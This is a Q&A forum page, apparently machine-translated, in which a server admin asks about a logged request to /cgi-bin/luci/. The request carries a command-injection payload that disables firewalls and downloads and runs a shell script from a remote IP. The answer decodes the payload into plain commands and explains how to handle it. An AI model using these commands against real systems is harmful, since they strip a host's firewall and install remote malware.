RError.com

RError.com Logo RError.com Logo

RError.com Navigation

  • 主页

Mobile menu

Close
  • 主页
  • 系统&网络
    • 热门问题
    • 最新问题
    • 标签
  • Ubuntu
    • 热门问题
    • 最新问题
    • 标签
  • 帮助
主页 / 问题 / 1537254
Accepted
Space Researcher
Space Researcher
Asked:2023-08-23 20:05:02 +0000 UTC2023-08-23 20:05:02 +0000 UTC 2023-08-23 20:05:02 +0000 UTC

对服务器的奇怪请求(cgi-bin 请求和 cgi-bin 漏洞)

  • 772

我发现我们新奇的 IT 初创公司的公共服务器正在接收奇怪的请求,显然是某种自动请求。请解释一下这可能是什么?

[GIN] 2023/08/23 - 11:49:28 
| 404 |       6.885µs | ip клиента(палить не буду, локация США) 
| GET      "/cgi-bin/luci/;stok=/locale?
form=country&operation=write&country=$(cd%20/tmp
%3Brm%20zizuo.sh%3Brm%20-rf%20zizuo.sh
%3Bufw%20disable%3Bsystemctl%20stop%20firewalld.service
%3Bsystemctl%20stop%20firewalld%3Bservice
%20iptables%C2%A0stop%3Bwget%20http%3A
//(тут тоже был ip , локация Нидерланды)/zizuo.sh%3Bchmod
%20777%20zizuo.sh%3Bsh%20zizuo.sh)"

我应该分析情况吗(如果是,如何分析)?安全问题值得担心吗?我们对这些人回复 404 好吗?

http
  • 1 1 个回答
  • 74 Views

1 个回答

  • Voted
  1. Best Answer
    Space Researcher
    2023-08-28T01:11:10Z2023-08-28T01:11:10Z

    进行了标准的漏洞搜索。谢谢,该机器人确实在测试 cgi 请求的漏洞。

    生成动态内容的最常见方法之一是使用通用网关接口 (CGI),它允许您运行以不同编程语言编写的 Web 内容生成脚本。

    默认情况下,该模块已加载,但当前不提供脚本服务;为此,需要在特定环境中启用它,所以就我而言,一切都很顺利。

    此类请求的本质是尝试在您的服务器上执行命令,在本例中为以下命令(可以在请求正文中看到它们):

    ...
    cd /tmp
    rm zizuo.sh
    rm -rf zizuo.sh
    ufw disable
    systemctl stop firewalld.service
    systemctl stop firewalld
    service iptables stop
    wget http ip тут был/zizuo.sh
    chmod 777 zizuo.sh
    sh zizuo.sh
    ...
    

    这该怎么办?您可以简单地返回 404,也可以返回非标准代码,例如 444,以便稍后在日志中更容易找到它。如果您愿意,您可以提交有关此类活动的投诉,以下是说明:

    • 转到任何 whois 服务,例如或此处
    • 查找有关滥用联系人或类似内容的记录,最简单的方法是搜索“滥用”一词
    • 您可以利用这些联系人来滥用
    • 1

相关问题

  • 403 和 401 响应代码之间的区别

  • 是什么阻止了 Tor 入口节点解密流量

  • 如何在 gorilla/websocket 的连接中添加带有 cookie 的标头?

  • 在 github 页面的自定义域上删除重定向到 https

  • Golang HTTP 同步

  • 告诉我如何将 http.client 传递给函数

Sidebar

Stats

  • 问题 10021
  • Answers 30001
  • 最佳答案 8000
  • 用户 6900
  • 常问
  • 回答
  • Marko Smith

    我看不懂措辞

    • 1 个回答
  • Marko Smith

    请求的模块“del”不提供名为“default”的导出

    • 3 个回答
  • Marko Smith

    "!+tab" 在 HTML 的 vs 代码中不起作用

    • 5 个回答
  • Marko Smith

    我正在尝试解决“猜词”的问题。Python

    • 2 个回答
  • Marko Smith

    可以使用哪些命令将当前指针移动到指定的提交而不更改工作目录中的文件?

    • 1 个回答
  • Marko Smith

    Python解析野莓

    • 1 个回答
  • Marko Smith

    问题:“警告:检查最新版本的 pip 时出错。”

    • 2 个回答
  • Marko Smith

    帮助编写一个用值填充变量的循环。解决这个问题

    • 2 个回答
  • Marko Smith

    尽管依赖数组为空,但在渲染上调用了 2 次 useEffect

    • 2 个回答
  • Marko Smith

    数据不通过 Telegram.WebApp.sendData 发送

    • 1 个回答
  • Martin Hope
    Alexandr_TT 2020年新年大赛! 2020-12-20 18:20:21 +0000 UTC
  • Martin Hope
    Alexandr_TT 圣诞树动画 2020-12-23 00:38:08 +0000 UTC
  • Martin Hope
    Air 究竟是什么标识了网站访问者? 2020-11-03 15:49:20 +0000 UTC
  • Martin Hope
    Qwertiy 号码显示 9223372036854775807 2020-07-11 18:16:49 +0000 UTC
  • Martin Hope
    user216109 如何为黑客设下陷阱,或充分击退攻击? 2020-05-10 02:22:52 +0000 UTC
  • Martin Hope
    Qwertiy 并变成3个无穷大 2020-11-06 07:15:57 +0000 UTC
  • Martin Hope
    koks_rs 什么是样板代码? 2020-10-27 15:43:19 +0000 UTC
  • Martin Hope
    Sirop4ik 向 git 提交发布的正确方法是什么? 2020-10-05 00:02:00 +0000 UTC
  • Martin Hope
    faoxis 为什么在这么多示例中函数都称为 foo? 2020-08-15 04:42:49 +0000 UTC
  • Martin Hope
    Pavel Mayorov 如何从事件或回调函数中返回值?或者至少等他们完成。 2020-08-11 16:49:28 +0000 UTC

热门标签

javascript python java php c# c++ html android jquery mysql

Explore

  • 主页
  • 问题
    • 热门问题
    • 最新问题
  • 标签
  • 帮助

Footer

RError.com

关于我们

  • 关于我们
  • 联系我们

Legal Stuff

  • Privacy Policy

帮助

© 2023 RError.com All Rights Reserve   沪ICP备12040472号-5